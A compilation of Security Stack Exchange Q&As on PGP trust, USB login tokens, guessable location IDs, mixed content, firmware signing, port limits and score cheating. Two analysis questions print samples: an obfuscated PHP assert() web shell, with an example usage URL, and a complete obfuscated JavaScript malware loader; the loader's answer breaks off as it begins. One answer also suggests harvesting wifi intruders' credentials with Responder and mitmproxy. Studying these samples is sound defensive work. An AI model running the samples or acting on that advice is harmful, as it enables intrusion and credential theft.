Should there be a reason for concern? Thanks for your patience as I learn more about crypto! | The key needs to be verified. If you trust that someone's public key does in fact belong to that individual and they are in your keyring, you can use your private key to sign your correspondent's public key and validate it. So you are Bob, and you trust that Alice's public key does in fact belong to Alice, so you sign it with your private key. Alice's key is now trusted by you. Also, any keys that Alice trusts, say someone called Chris, will be in your web of trust as well. So you can also trust Chris, because Alice does, and Chris's key will be certified with a trusted signature. Now if Alice trusts that your key does belong to you, then she can validate your public key by signing it with her private key, and your key will then be included in that same web of trust. A procedure was given to validate your correspondents' public keys: a correspondent's key is validated by personally checking his key's
fingerprint and then signing his public key with your private key. By
personally checking the fingerprint you can be sure that the key
really does belong to him, and since you have signed the key, you can
be sure to detect any tampering with it in the future. Unfortunately,
this procedure is awkward when either you must validate a large number
of keys or communicate with people whom you do not know personally. GnuPG addresses this problem with a mechanism popularly known as the
web of trust. In the web of trust model, responsibility for validating
public keys is delegated to people you trust. For example, suppose Alice has signed Blake's key, and Blake has signed Chloe's key and Dharma's key. If Alice trusts Blake to properly validate keys that he signs, then
Alice can infer that Chloe's and Dharma's keys are valid without
having to personally check them. She simply uses her validated copy of
Blake's public key to check that Blake's signatures on Chloe's and
Dharma's are good. In general, assuming that Alice fully trusts
everybody to properly validate keys they sign, then any key signed by
a valid key is also considered valid. The root is Alice's key, which
is axiomatically assumed to be valid.
Trust in a key's owner
In practice trust is subjective. For example, Blake's key is valid to
Alice since she signed it, but she may not trust Blake to properly
validate keys that he signs. In that case, she would not take Chloe's
and Dharma's key as valid based on Blake's signatures alone. The web
of trust model accounts for this by associating with each public key
on your keyring an indication of how much you trust the key's owner. There are four trust levels:
unknown - Nothing is known about the owner's judgement in key signing. Keys on your public keyring that you do not own initially have this trust level.
none - The owner is known to improperly sign other keys.
marginal - The owner understands the implications of key signing and properly validates keys before signing them.
full - The owner has an excellent understanding of key signing, and his signature on a key would be as good as your own.
A key's trust level is something that you alone assign to the key, and
it is considered private information. It is not packaged with the key
when it is exported; it is even stored separately from your keyrings
in a separate database. The GnuPG key editor may be used to adjust
your trust in a key's owner. Read more here. Also have a look at this answer from Server Fault. | {
"source": [
"https://security.stackexchange.com/questions/147447",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/122524/"
]
} |
147,463 | My bank recently revamped its website, and it changed for the better as far as I'm concerned. Especially, security seems to have been dramatically enhanced. Most importantly, they introduced a rather unusual (I've never seen this before) identification method, which they call the 'electronic certificate'. Basically, you have to go to the bank in person and the guy gives you a tiny, cheap USB stick with a very low capacity. From this point, you'll be required to plug the stick into your computer every time you want to log in. The stick alone is not enough, you also have to type your password - basically, 2-factor authentication with a USB device being the second factor. How can this possibly work? Of course, I believe the USB stick to contain certificates/encryption keys of some kind that are used in the login process, but they don't require the user to install any software on the machine. I find it rather creepy that a website accessed from a sandboxed web browser, with no plug-in/module/app/toolbar installed whatsoever, can see the USB stick you just plugged in. And not only see this stick, but read it and use its content deeply enough to log you in to the most sensitive level of your online banking app. I am not a big fan of plugging unknown devices into my computer to begin with, and my warning light flashed when this was explained to me, so I went for another identification method (you can choose). I'm just curious. PS: the measure obviously does not apply to their mobile apps, since smartphones don't have USB ports, but that's not a big deal because you cannot do much with their phone app (it's mainly a consultation app, not something you can actually make big payments/transfers with). Edit: no open file dialog is used, which would make the explanation quite clear. | What your bank gave you is a USB security token with a digital certificate (like these). These are standardized hardware devices which almost every operating system supports plug-and-play, out of the box. They are very common for implementing multi-factor authentication to high-security systems in enterprise IT. Your web browser uses HTTPS with client-based certificates to access your bank's website. It uses your operating system's certificate store to find an installed certificate which matches the identity the webserver requests. When you have a standard USB security token installed, the operating system will also look for any certificates on the token. The operating system cannot do the verification process with the webserver by itself, because the token doesn't allow the private key of the certificates stored on it to be read directly. The token includes the hardware to do the verification, so the private key never leaves the USB stick. That means even if your PC is compromised by malware, the private key of the certificate isn't in danger of being stolen (but keep in mind that this method doesn't provide any protection after the authentication was successful - malware can still screw with your web browser). By the way: which bank is that? If my bank also supported this authentication method, I might even start doing online banking.
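From the web application's point of view this is just ordinary TLS client-certificate authentication; the only special part is that the private key lives in the token's hardware. For illustration only, here is what the client side looks like with a software certificate (hypothetical file names and URL; a real token never exposes a key file, the browser talks to it through the operating system's certificate store instead):
import requests

# The server requests a client certificate during the TLS handshake;
# authentication fails unless we can prove possession of the private key.
resp = requests.get(
    "https://onlinebanking.example/login",
    cert=("client-cert.pem", "client-key.pem"),
)
print(resp.status_code) | {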
"source": [
"https://security.stackexchange.com/questions/147463",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/-1/"
]
} |
147,820 | I recently purchased a satellite communicator that allows me to send a map of my location to friends and family while I'm hiking in the wilderness. While testing out my product, I noticed that the URL was constructed like so: http://www.example.com/mylocation/?id=YYYYY/XX.XXXXN/XX.XXXXW where the Xs are digits that are part of a physical latitude/longitude and the Ys are part of a 5-character alphanumeric ID. Being curious, I truncated the latitude/longitude part of the URL and changed the ID by one character: http://www.example.com/mylocation/?id=YYYYZ By doing this, I could then see a different user's:
- physical latitude/longitude location on a map
- device name (whatever they chose to call it; most people have something like "Harry's GPS")
- custom pre-set message used while sending their location, if they have one set (ex: "Checking in - I'm safe.")
My question is, does this present a security flaw, and should the company be alerted about this? My argument for contacting the company would be that seeing other users' physical locations is a blatant flaw; however, that's the entire point of the product - to easily share your location with your family/friends. I also can't see whom the device actually belongs to (name, phone number, username, email, etc.), so the location data is anonymised as far as I can tell. | Yes, you should notify the company of the problem - with caution. Update: a shorter, very complete answer was supplied by @crovers. But if you have patience... the problem here is not simply the possibility of tracking J. Random Stranger, but rather that:
- Once your ID has been given to someone, apparently you cannot take it back and it does not expire. That person can now follow you everywhere (think "overly attached girlfriend"). Also, that ID may leak. Emails get forwarded by mistake, and sometimes the little, easily overlooked "..." glyph in mail programs covers lots of sensitive information.
- You don't even need to give it to me. If the IDs are sequential [as commented by @crovers], I can tabulate all of them in very little time, check their positions, and easily single out the five or six that are near enough to the position I know you might be in. Tomorrow, another five or six will be near enough to a different place you're now in; of those, maybe two were in the original five, so you must be one of those two. In comparatively little time I've narrowed my candidates down to one: I now have your ID and can stalk you, and you are none the wiser. I may not even know you.
- The ID can be used to prank total strangers. I just googled a bit and found a couple thousand Facebook users that boasted of their new (NAME OF GPS-RELATED GADGET). I used a very well known brand, so your gadget will have maybe only one hundred people that I can discover easily. A full half of those, I'm confident, will routinely post pictures about where they are (does Facebook purge EXIF GPS information?).
In a very little while, one of them that caught my fancy might receive a message stating "How's the weather in Old Nowhereville?" even if he (or she) never said anything to anyone about where he (or she) was, nor even posted anything anywhere. Such pranks - and knowing that some total stranger is apparently interested in you, and always seems to know where you are - can totally ruin your day.
And they can totally ruin the company's day, if some pranked people get convinced that their GPS can somehow be "hacked remotely", even if, as in this case, that's not what's happening at all. Yes, I have a sick mind - but I'm not the only one, so you might want to point the company's people to this page - and, to restate another very good point made by @crovers and Arminius, do so anonymously. The potential damage to them is huge, and you're doing them a big favor by pointing this out to them. But some companies might have a (knee-)jerk reaction and try to bully you into silence, believing this solves something (or even solves the matter entirely); Nobel laureate Richard P. Feynman's "vulnerability disclosure" story makes for hilarious reading ("That was his solution: I was the danger!"). You're actually helping them. Trust me, lots and lots of people would do exactly what you did when seeing "id=XXXXX" in a URL. I would have done it. Depending on the gadget's popularity, I'd wager many others will already have done so. So it's not like you're unleashing a zombie apocalypse on someone who otherwise would have remained safe - you'll probably simply be the first to have had the conscience to tell them they are not safe at all, because that's significantly rarer than having the curiosity to change an ID. It totally didn't have to be like this. It is trivially simple, from the company's point of view, to fix this by allowing each user to regenerate a different secret ID on demand any time they choose, and even set an expiration date. And they still could do it now. A very quick fix could be to proxy their website through a simple filter, connected to a database. Your new URL is, say, http://www.example.com/mylocation/?id=22b255b332474ae3e7f008cc50ebe3e0 - or one could translate that to "true.pony.pile.main.jazz.call.mine.soft.pink.rake.jane" to get something more easily remembered or dictated over a phone. (The first four words are somewhat connected to "correct horse battery staple".) The proxy checks in a database and finds that 22b255b332474ae3e7f008cc50ebe3e0 is a valid ID associated with the "real" (or "old") id 12345, so it transforms the URL by simply replacing the ID with 12345, sends the request to the true, hidden website, gets the page back, rewrites any 12345's with the original 22b2... stuff, and hey presto!, the external user can see where you are, same page as before, but he has no way of knowing that the true ID is 12345 (and, even if he knew, he'd have no way of getting it through to the system, which now only accepts hashes). But now, user 12345 can have as many IDs active as the company wants (or sells!), and give one to his mom, one to his SO, and so on. One ID leaks, or he breaks up with his friend: he invalidates that one ID. It also becomes possible to know how many accesses there have been to each ID, so the snooping can be two-way. Possibly for premium users only :-D. For some IDs, the website may even release randomized information, or low-precision GPS coordinates. And if you wanted to guess a valid ID at random - well, there are some 2^128 of those. If each customer had one hundred disposable IDs (say 2^7), and the company had one billion customers (say 2^30), there would still be approximately one possibility in 2^90 of getting a valid ID by trying at random. If that's too little (or if my math happened to be a bit askew), there are larger hashes too.
And the old ID no longer works, since you can't reach the original server without the ID you supply getting hashed. Given the reasonable implementation cost (a couple of days' worth of work for one developer and one QA engineer, and I'm padding heavily), I'm a bit baffled that this wasn't designed in from the start.
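The token-mapping idea really is only a few lines of code. A toy sketch (Python; an in-memory dict stands in for the database table, and because the IDs are random they cannot be enumerated):
import secrets

tokens = {}                              # token -> real device ID

def issue_token(real_id):
    token = secrets.token_hex(16)        # 128-bit opaque, revocable ID
    tokens[token] = real_id
    return token

def resolve(token):
    return tokens.get(token)             # None means unknown or revoked

def revoke(token):
    tokens.pop(token, None)

t = issue_token(12345)
print(t, "->", resolve(t))
revoke(t)                                # the overly attached girlfriend loses access
print(t, "->", resolve(t)) | {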
"source": [
"https://security.stackexchange.com/questions/147820",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/44995/"
]
} |
147,928 | I went to sign into a website today using Google Chrome and was presented with the following error:
Your connection to this site is not fully secure
Attackers might be able to see the images you're looking at on this site and trick you by
modifying them
When I clicked the Details link, it said the following:
The site includes HTTP resources
I have never seen this warning before. What does this warning mean in layman's terms, and should I sign into the website with my username and password? Extra: opening the same page in Microsoft Edge, it claims the website is secure. | In a nutshell, it is saying that while the core of the page is using HTTPS (secure) to get that information to your computer, that (secure) page references insecure elements (like pictures and possibly scripts). Attackers can't directly change the original page, but they can change the insecure elements. If those are pictures, they can change the image. If those are scripts, they can change those, too. In that way, attackers could change what you see, even though the core page was 'secure'. As Michael Kjörling points out in the comments, this also exposes some of your information in these requests - potentially cookies (if it is the same site / matches the cookie sites / the developer didn't specify secure only), referrers, etc., which will leak some information about what you are doing in the best case, and in the worst case may allow certain attacks. This is bad practice on the part of the web developer - all elements should use secure transport. You could (potentially) improve your own situation using a browser plugin that automatically upgrades HTTP requests to HTTPS.
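If you want to see exactly which elements trigger the warning, the insecure subresources are easy to list. A crude sketch (Python; the naive regex only catches plain src/href attributes, so treat it as a starting point):
import re
import requests

page = requests.get("https://example.com/").text   # hypothetical page
insecure = set(re.findall(r'(?:src|href)=["\'](http://[^"\']+)', page))
for url in sorted(insecure):
    print("loaded over plain HTTP:", url)
The browser's developer tools (Security and Console tabs) will report the same list more reliably. | {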
"source": [
"https://security.stackexchange.com/questions/147928",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/87457/"
]
} |
148,015 | I noticed our Internet was bogged down. I checked the IP addresses of all devices connected and found the MAC addresses of the culprits: Question: How to find their geographical location based on the MAC addresses? I know they are in the neighborhood of Columbia, Md. 21045. One of them is an iPhone and another is an Android phone, which should allow GPS triangulation, but that option is only available to the carrier and law enforcement. | Physically finding them is not easy. If you are really willing to catch them, buy a couple of ESP8266 modules (search eBay for them), research this project a little, drop a couple of modules around, and you can probably find them. But it will cost a lot of time, effort and some money. Even if you cannot physically locate them, you can play some tricks with them:
- Install a captive portal saying the network is an experiment on automated hacking and asking users to only continue if they agree. Ask for email or Facebook auth, or ask for a phone number to send a login PIN to.
- Install something like Upside Down Ternet, Backdoor Factory or AutoPwn.
- Put QoS in place on your router, with 1 kbps of bandwidth for anyone outside of a whitelist.
- Install Responder along with mitmproxy, and get all the auth data you can.
My network is pretty secure, but sometimes I think about installing a WEP wifi network just to play around with internet thieves. | {
"source": [
"https://security.stackexchange.com/questions/148015",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/135991/"
]
} |
148,189 | I went to download the latest firmware for my router and noticed the download link is not HTTPS, so I sent the following email to the manufacturer: I went to look for new firmware for my Archer C7 router, but I saw
that the download link is over unencrypted HTTP, not secure HTTPS. I
would never download software or firmware over an unsecure connection.
Please upgrade your site to HTTPS.
This was their reply:
The device will verify the integrity and correctness of the bin file,
if it is tampered, it won't be able to upgrade successfully. Don't
worry, you can download it. Ignoring the fact that they have no excuse for not using HTTPS, my question is: Is it even possible for the router to confirm that a new firmware file hasn't been tampered with? How would that work? | Sure - it could be a signed image. If the router has a built-in public key, and the image was signed by the corresponding private key, it would be perfectly safe. Unless someone had got the private key, and uploaded a malicious version to the server, in which case, HTTPS wouldn't help either.
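In practice this means the vendor signs the firmware image and the router ships with the matching public key baked into its bootloader, so it can reject anything that doesn't verify. A minimal sketch of the verification side (Python with the pyca/cryptography library and an Ed25519 key; the placeholder key bytes are obviously not a real vendor key):
from cryptography.exceptions import InvalidSignature
from cryptography.hazmat.primitives.asymmetric.ed25519 import Ed25519PublicKey

VENDOR_PUBLIC_KEY = b"\x00" * 32        # placeholder; burned in at the factory

def firmware_is_authentic(image: bytes, signature: bytes) -> bool:
    key = Ed25519PublicKey.from_public_bytes(VENDOR_PUBLIC_KEY)
    try:
        key.verify(signature, image)    # raises if image or signature was altered
        return True
    except InvalidSignature:
        return False
Whether the vendor actually does this, rather than a plain checksum (which only detects corruption, not tampering), is exactly what their vague reply leaves open. | {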
"source": [
"https://security.stackexchange.com/questions/148189",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/116955/"
]
} |
148,236 | I'm cleaning up a website after an attack which resulted in many PHP shells being uploaded. I've found and removed the following code: if(isset($_REQUEST['e'])) { $b="ass"."ert";$a=$b($_REQUEST['e']);${'a'}; } Could you tell me what it does? How does ${'a'} lead to code execution? Is the injected code sent by POST request? | It's an obfuscated web shell that allows remote code execution. The script feeds $_REQUEST['e'] into the assert() function. That evaluates the e request parameter as PHP. Use it like this: http://example.com/shell.php?e=phpinfo() assert() is a debugging feature to evaluate assertions. But if you feed it an arbitrary string it will be executed as a PHP expression. It's a fancy way of avoiding eval() to prevent malware detection. Here is the snippet reformatted and commented: <?php
// Make sure request parameter e is provided
if(isset($_REQUEST['e'])) {
// Complicate static analysis by assembling "assert" from multiple strings
$b = "ass"."ert";
// Evaluate assertion (yes, in PHP you can "call" a string as function name)
$a = $b($_REQUEST['e']);
// Junk. The assertion has already run, this doesn't do anything
${'a'};
}
?>
How does ${'a'} lead to code execution? It doesn't. $b($_REQUEST['e']) is where the assertion runs. The code works without ${'a'}. Is the injected code sent by POST request? $_REQUEST allows the parameter to be sent via both GET and POST. (As an aside: string arguments to assert() were deprecated in PHP 7.2 and removed in PHP 8, so this trick targets the older PHP versions that were widespread at the time.) | {
"source": [
"https://security.stackexchange.com/questions/148236",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136206/"
]
} |
148,370 | Assuming you were able to modify the OS/firmware/device for server/client to send and listen on ports higher than 65535, would it be possible to plant a backdoor and have it listen on, say, port 70000? I guess the real question is this: If you rebuilt the TCP/IP stack locally on the machine, would the overall concept not work due to how the RFC 793 - Transmission Control Protocol standard works, as mentioned below in some of the answers, making it impossible to access a service running on a port higher than 65535? There has been so much talk about hardware and devices having backdoors created that only governments have access to for monitoring, and I was just curious if this was possibly one of the ways they were doing it and avoiding detection and being found. | No, the port number field in a TCP header is technically limited to 2 bytes (giving you 2^16=65536 possible ports). If you alter the protocol by reserving more bits for higher ports, you're violating the specification for TCP segments and wouldn't be understood by a client. In other words, you're not speaking TCP anymore, and the term "port" as in "TCP source/destination port" wouldn't apply. The same limitation exists for UDP ports. That said, a backdoor could instead communicate over a different protocol than TCP or UDP to obscure its communication. For example, icmpsh is a reverse shell that uses ICMP only. Ultimately, you can also implement your own custom transport-layer protocol using raw sockets that can have its own notion of ports with a greater range than 0-65535.
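You can see the 2-byte limit directly by trying to pack a port number into the 16-bit field the TCP header uses:
import struct

print(struct.pack("!H", 65535))  # b'\xff\xff' - the largest value that fits
struct.pack("!H", 70000)         # raises struct.error: needs more than 16 bits
Any "port 70000" would have to overflow into neighboring header fields, which is why a standard peer could never parse it. | {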
"source": [
"https://security.stackexchange.com/questions/148370",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/31084/"
]
} |
148,425 | I'm creating a web application that has a simple JavaScript game in it. Once the player finishes playing the game, the high score is sent to the server and saved. After a specific period the player with the best score receives a prize. Is there a way to send the high score securely and prevent the client from sending 'false' high scores? Currently we are using: HTTPS, and a random server token issued before each game and sent back alongside the score after the game is finished. | The server can't fully trust any data it receives from the client, so validating high scores is difficult. Here are a few options:
- Obfuscate the client-side code and traffic to the server. This is the easiest option - it will still be possible to cheat, but probably won't be worth anyone's time.
- Send a full or partial replay of the game to the server for validation. The player's moves can be run on the server to determine the legitimate score (see the sketch below). This will work for some games and not for others.
- Move the game logic and validation to the server. The client simply relays each move to the server, where it is validated and the game state updated.
It comes down to how your game works, how likely it is that people will cheat, and how much you care if they do.
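For the replay option, "validation" just means recomputing the score server-side from raw events instead of trusting a client-reported total. A toy sketch (Python; a deliberately trivial game where each move is worth a bounded number of points):
def validate_replay(moves, claimed_score, max_points_per_move=10):
    """Recompute the score from the move list; reject impossible moves."""
    score = 0
    for points in moves:
        if not (0 <= points <= max_points_per_move):
            return False                    # physically impossible move
        score += points
    return score == claimed_score

print(validate_replay([3, 7, 10], 20))      # True
print(validate_replay([3, 7, 999], 1009))   # False - cheating attempt
A real game would replay actual input events against the game rules, but the principle is the same. | {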
"source": [
"https://security.stackexchange.com/questions/148425",
"https://security.stackexchange.com",
"https://security.stackexchange.com/users/136399/"
]
} |
148,497 | I'm a sysadmin and one of my users just told me that he opened a JavaScript file received by mail. Apparently there is no impact, but since I don't know this language well, especially when it's obfuscated, I'm asking for help. Here is the code:
function zxylv()
{
var a = 1;
var abisr="cf72ac2439a7222a712ff7b38b6c25f1023aac22b666cfb52bd1429e8538a9b08b022db5938e0f2df6e0ac703ebaf23d7a21ffb19ad43ebeb20a3564a7039d633ed3920c9e60aca6ca512ff2e2dc3d20d8c20b8e2ed062db5b2fcdf27e6765e7337d8838d293ed9b35c2337b7a3aa152dc493eba76caab34c9321f2020abb04f5438cb538dfb3ca1b6cc8e71ea06ccb422a4c29bff3bf1a6ccbe0df2a2fea038dd025c413ab3b29e9814b9a03eb02ee9a26de629da82fba338f5e64ca36ece601aff1fd2814b2301eeb00d0a7ee2662c6e14d3501c9e00fee04a2d18ebe18c111cdf16eb8065e6b77bb234b5421dcc20d7b04d8d38c7038cb03cc5962c9e23a863cfb229e1622a0264e496edb10bc2709a8318df76eb6e60b776cd3339d143ee3d20a1160dab6cf2d2aa362dbc420de93fd3f29ab265b5377c5534b7621b1120ab304ec538b1238ca23ce5562e6e3fe0529a2922c6f28fae64fba65ea877bf825b622ac576cd2c64d1734e2821c8d20c3904bf538ecf38ced3ce5362ea73fc5838bd92ddb038a3139e843fcc36cfbf71d3f71ce46cded7ee627cc9e7ce3a65d4c6cd3537f913ee4c29fdf38f4f39ecf3efb522e3c6cf1e2fc042db2620ddd20db22ec9f2db532fb4e27aea64ccc34a0d21a1720b5904dd738d7338dba3cd1e62f431ed6229bbf3fad83cee923c5d22eea3fb8129"+
"c2c0ea0c23a5128bf735b4260b5e6cf4e2ab052da8420fba3ff3b29d4665b5a77c8931fdc29e1120fc53ff1d29a2537bd13ee0329d2738e7a39dc33ea9e22e7e6ce4c2fbec2daef20c3c20c162ed082de9f2fd2b27f4464d2a22d1d39c4c20b5b20aaf60e1f6cb0938f823ef2439cc729d8965b2977a9b31ec131dfa2fcda2dc3438efb2fa0d24be06cd9164ac329fda3ecb73ec5623ac33ef4565e3437f4c3ed8b29a2538b5139bff3ee6022ccf6cfdb2fe9e2db9220c5620acc2eefd2da222fb7127a6764fb322d7e39c5920b8220cd660f136cdf138c133ed4039d6f29e2a65ab277a2731f7d31fdb2aaab39b3022b002fc2d38eb425eb623dd122fe36caa92be8729d9138bc408e1c2dd8f38c8a2dd7664ee42fea42dacf20db620a6d2eaaa2db9a2fa1327a7a65d1137ae138beb3ec2835bb337dc92bcf329a4a38f6b08e622dd1338d132df420ac033eeff23a8a21de019f1c3ecd320ac864b686ece824c0b38d1638ff43cdeb76b0a63e5b63fa938eb525bf022f5935bc339a643eb2220db262b1a2feee23daa21a9663cd524ea929de67ffea2ee5c24ad97ea207bfe96ef9360cab6cf192aa1339d9322e522fd3738b4525e6623c2522efd64a593ef1929b193fc0239d8620f1938a6b60c416cf0329a923eea63ec7723eb73ec4165dd96ce0937dbf25b332abdc6cdf564dce6de3629"+
"b223ef063ef3423b3c3eea965ffa37e493efb829e5438e4739b983ec4122f146ce562ff3e2dbff20ad220d9d2ea832db762fdad27a1264ac23ebc729d903fdd939cd620d7d38c7660dab6ce572af682de7520eb13fc5029ed865c5677edb31f5329acd20fa23fa7729d5d37e592bead29cab38e3108b1d2deb238abf2de890aaae3ed4423c2921e1319f8d3ec7e20c0e64c0b6ecb824cbe38ed038e7d3cace76dbe63f8763dec23d772ddc121b4b22f9823f8624b5b22a7828ae43ceca25c7a3bbe23cd0d25df22fcaa2be6221b0662ebc23ccc22db925b3f23e6f22ae862e0722ee139dd763d117dafb7cf6862df421a4623e2a3ae306ec1360fe36cf9e2ab3e39b3f22ee42fc9238d0625e9823d7022bb064c893ec5129c843fca739b0620ded38d0860e9e6cc2629e523eda03ea2f23a963ebe165f5a6caca37e7425c6b2acbd6cfb264e4b6dc5d29b773edb63ef8a23c973ea9c65bf337e5f3efe029edd38d5339d903ee4622bfc6ce562fb5d2da9b20b9e20b6e2ef5c2ddf22ff8a27c6d64fac3ec0229ff73fd1f39c6820c9c38b5160afe6cbb72af1c2dfb820c413fdef29e0e65ee577b6c31aa229ac120aeb3fddb29b9837fea2bf9a29f8538d5408e092dfa338ece2dede0ad7c3eba523f7421c3c19ad43eb9920d8264a4c6eb2924be738a8c38ec83cb0d76ce163b1d63c6638efd25"+
"ee122f4235b7139f093ec8620eaf62f2f2ff4e23d0621e8463f8424e3729e8d7fa272ed0f24e907ee5a7bf2f6efb860abe6cb972ac6039e5122f632fbfb38ad525da923b7a22b2664d223ed6029adf3fdb439f8020fa838dc560f7f6ccb629ad73ec993ec3f23a4b3eed865b9e6cf7037be625dcc2ac386cf3664b9f6df1129d253ec233ee5b23f223ec7165ffc37d7f3ee4229b8038b4a39bfb3ed5d22f226ccf42fc502dc1920b9e20a932ebda2df2d2fc6c27bd164a933eaf129c663fec639def20c2838f5560b266cb9b2aeb92deb120afe3fb5529d4165ec177f5231bf629d4720e7e3fd6b29a6837b863eba029c3d38c1039cdd3ed2c22ea16cc082fb4d2da6320c0020fc42ec472dba72ff3527fb764ca222dea39a6d20f6420edd60da06cf1d38a593ed2a39ec629b5e65cde77ad531eaa31a0865e3377de331c2831eb965d9677eda31e3831e3665b1e77e3031c3c2fccb2dd3d38a292ffb224aaf6cf0264b9529cc63eca93eaeb23e883ed3a65c5c37ef83eae229eab38ad539c513efca22bfa6ceb32fc652dac920fb820bc72ecc22dadf2fc4427cfe64a3d22f1039e7e20b8b20f4860b756cdc138fdd3ed4139f0e29fa265d7377b5931b8e31e342ac6a39de722d052fd3838de125daa23d5122f966cbac2bb0f29ce538a0418d5c29fce21b6f3cbf00ae8f25e4720b9229acb1c"+
"e5a2db7538ce924bb664bea65a4037f3238d253ea6d35b7a37e6f3ad062dfe53eb316cd6e2ab833fe466cef771bec6ca2422fe029d833be526cb050db4a2fb9338c7725f653ab0429eb514b7503f2c2ee2126a6a29bad2fef738a6d64c336ef6c1fe592fb8f3ec4125b323cb3838e7225f6122b872baf962b0d0aa9325dba20c4f29c811fdc335eb03fa9e38ab729cb521aff03ef72ea8226ff529d6c2fdf938ff46eceb65b2777f933ae012de8e3eb876cc4638dca21c803ce480aa0725fe920ba229baa02c822dcb021f2c29ac06cf3171c156cf3f6ebed10f3810f836ecfa6cd5767a286ce4401de72dd6838f3024f7962d3b3eae42db7222fe628b3723f2021e0064b3f65fe262ca838e4023d401ff7138e413eb7325f2422bec2be5f64f1f7fe697ac5b65ede62db73fd0039df12ef933fed338fb73ed9764d7c7eab160fbf6cf5075ad465f726cf2a67e186cab46ec6b62ed329fff34fa029d7d6eb9a77c513ac232da133ed2f6cf9438d8221f213cdda0ab7225aaa20f1f29f911cea12da5238e2a24aa26cb6471be16ce382aa323fdd362d9a0bd7629d8038f6b1fb873ccbc29deb2fdfd25afe2db9c20c260aaac23c5420ee928d5129aac3ef4b64dda7ece965b326ca8467c9f6cbd438cd321e873ce910af6525cd320a4229d9502fac2da2521e6329ace77bb83efae29f7538ad339"+
"be63eb0d22d796cb7a38d6e21f9b3cfc70ab8225a4820c4629d751cebf2df5538b0b24e4277ee031db62fadd2da1238d862fe2b24b186cbdb64c3529b293eb183efa423bb13ead265a9937c903ebda29d1838b9039dbb3eaeb22dc66cee22ae1e2de3820d013facd29f7d77bb631e6131d9e2ab3c39d1b22fec2ffff38b8925b0523a7a22e076cb8c3fb152db583aef829fa818c6723c8d18ea829bad21e983cbaf64afe28b242df1338bbc2df4360a006ce952fcce2dba820fe320de12ed532df232fe7d27f2265e4a37c3438f9e3efca35b7037c103ac9d2dd6e3ef466cde83cfca2dc5d38d1624dc36cb1971f706cbd32bb8829a3b38ccb18e8829ddc21c7d3cff00ae2025cd120a3f29b661cf992dce538aec24d9064cee65bbf77fa125c2d2ac316cc6664f1f3cb8f2dd9d38b3624e9665eb137f9a3affc2dd7e3edc56ca8623ebc2ef4626d981fe8e38b5a3eb2329ed22df8921f256ca2b71ce86cacb22c6429e5b3be0e6cdd10dfdf2fea638c6725d783acb829ff414d6003f5d2ec4726cc529c932fc6d38fb364a706edb50da9408b2903edd08f510eabc62c351fd9a38c573ed6c29be92dce221f536eb3e65ad577a1e23e822eb2a26e9e1fc3538a643efd429e992daca21af862b1903bee3cb4129a3022e9c64ba265c7e77f4923b452ee5426c951feb538e183ee2a29d132db5d21"+
"cc462c9718eca35aaf3cc2829d146ced571cc66ca667da0a77ee723b6f2ed3b26b671fbb838f683ee4629a032dc0821fb262cb21bef73ef9925ddd38e1029ccf64ea228bca2dc4538e212da9b65a7a77d4323abe2eea126d2c1fc1738c543ebc829cb92dcc121bf862f7a1ce8723e713fef325f5338bc725ce423e7f22cfb6cc1071ede6cdc87cebd77ebc23a822ebad26d1d1fef538f433eca329a812daed21df062cd51fafc2db373aac729ea518a7923bf40acfa25dea20c8029ed764b163ce492dc5638f3e24a5760d056ce147ed9465bfb77fd023b102ed1c26a711fc3338c583efe229ad22db6a21d0062b670ff0820c3823a5d3fab129c2664ff565ee277a583efc129b1738fce39a333ed5822c736ccb52ff932da8320b8820f352ef852da222fa5427bd864f5f3ceca2db0438cba24df260e056cb6b2ad7d2dd9220ede3fc9529b8265eaa77ae731f9629f8e20ab53fe5a29ff46cfc137f303ea7129a4a38f5a39b133edda22de76cfcb2fc8a2dd6720f2020b3e2eb642de382fd7827fe664c8522e4139da920b5d20fee60b436cb8838c8a3ee2139cee29f8765e6077ae531d4931cf82fc4b2dd7438aca2ffbc24f2b6cfc464ab929fb93ea6c3edcb23a4f3efc665ef237dad3ec7f29a3a38c5739e133ec2822ba46cea72fe742db6220beb20a732ee952ddf02fada27a5b64d8622"+
"f8139b5820c8d20dcc60bf46ccfc38d9a3eb0839ebb29d6465e3a77e6e31cc831a542be9329ad138e9908db22da0d38f332da1664fea2af6839a8b22c852fd0238d9a25a2723b3e22af36cbf464da328b682df8e38cd72df7160ef96cc1029e5b3ee6a3ee0023b343ec7965f316cf0f37b6525b442afa46cc9864a7c6df6729b993edfe3eab223a8b3eeb265bf537cae3fde92da2f3aed529b3c18eaa23fb718edf29fc021f183ca8264e3228c542dc4138d932dc7c60a496cc362acd339e0422c0b2fd0d38d1325f7623f1f22e856cf9964b1b3cd692df5238aab24f3560dc66cf0b29a8c3ee743eb3c23f8c3ec2265af76cae237eb425b612ad2a6cb4364a496db8b29a533efc53eec423be33ecdf65d1537d9638bc03ecdc35a2537f203aed62dbc33ec126cd7f3bc1f3ffa824a146cf8271d836cf3522c2329f5f3beae6ce470deb72ff8238b0225d593add129f0414ae503ab92ea9426a8729c632ff3038e7364ee86ed951bd5f1ff5f2fe803ed9325f003caee38bc362eb01faa924d3229fa620f6a20d636ebdb65c9577ea53bed23fabc24fb762b491eb1439fc022c7f64d0b3cbf42dcff38fdb24ff865da477ed831d492ffd52db4a38bb52fee424b726ca3e64fef29b993ec973ee1023cc83ef2a65c676cf5637e8c31e0f31e7f31fb765c3f77f2e31b9b31f4d65ca377";
var uumod;
while(true){
try
{
uumod=(new Function("fgwus","var ccuru=fgwus.match(/\\S{5}/g),tgrdm=\"\",ikkne=0;while(ikkne<ccuru.length){tgrdm+=String.fromCharCode(parseInt(ccuru[ikkne].substr(3,2),16)^76);ikkne++;}"+tljsw()+tljsw()+tljsw()+tljsw()+"(tgrdm);")(abisr));
break;
}
catch(er)
{
}
}
return uumod;
}
function tljsw()
{
var vqqfn=new Array("e","v","l","a");
return vqqfn[Math.floor(Math.random()*vqqfn.length)];
}
zxylv(); Can someone tell me what this code does? | The procedure for dealing with obfuscated JavaScript is very similar to how you deal with it in PHP. In this case, the real action is going on in this line:
